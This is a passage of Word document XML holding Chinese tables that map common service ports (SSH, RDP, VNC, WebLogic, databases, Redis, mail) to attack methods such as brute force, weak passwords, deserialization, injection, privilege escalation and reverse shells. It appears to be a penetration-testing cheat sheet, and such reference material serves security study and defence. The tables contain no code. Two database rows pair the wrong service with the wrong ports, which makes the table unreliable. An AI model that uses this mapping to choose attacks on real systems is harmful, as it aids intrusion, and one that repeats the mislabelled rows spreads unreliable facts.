              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>注入、允许匿名访问、弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>远程连接服务器端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="936"/>
        <w:gridCol w:w="2174"/>
        <w:gridCol w:w="5689"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>使用说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SSH远程连接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破、SSH隧道及内网代理转发、文件传输</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Telnet远程连接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破、嗅探、弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>3389</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>RDP远程桌面连接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Shift后门（Windows server2003以下版本）、爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>5900</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>弱口令爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>5632</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>PcAnywhere服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>抓取密码、代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web应用服务端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1796"/>
        <w:gridCol w:w="3089"/>
        <w:gridCol w:w="3971"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>使用说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>80、443、8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>常见的Web服务端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Web攻击、爆破、对应服务器版本漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7001、7002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>weblogic控制台</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>java反序列化、弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>8080、8090</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>JBoss、Resin、Jetty、Jenkins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>反序列化、控制台弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>9090</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>WebSphere控制台</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>java反序列化、弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>4848</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>GlassFish控制台</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>1352</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Lotus Domino邮件服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>弱口令、信息泄露、爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>10000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>webmin控制面板</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>数据库服务端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1785"/>
        <w:gridCol w:w="2378"/>
        <w:gridCol w:w="3576"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>使用说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>MySQL数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>注入、提权、爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>1433</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>MSSQL数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>注入、提权、SA弱口令、爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Orace数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>TNS爆破、注入、反弹shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>27017、27018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>PostgreSQL数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破、注入、弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>6379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Redis数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>可尝试未授权访问、弱口令爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Sysbase/DB2数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破、注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>邮件服务端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="936"/>
        <w:gridCol w:w="1844"/>
        <w:gridCol w:w="1416"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>使用说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SMTP邮件服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>邮件伪造</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>POP3协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破、嗅探</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>IMAP协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>网络常见协议端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="988"/>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="4812"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
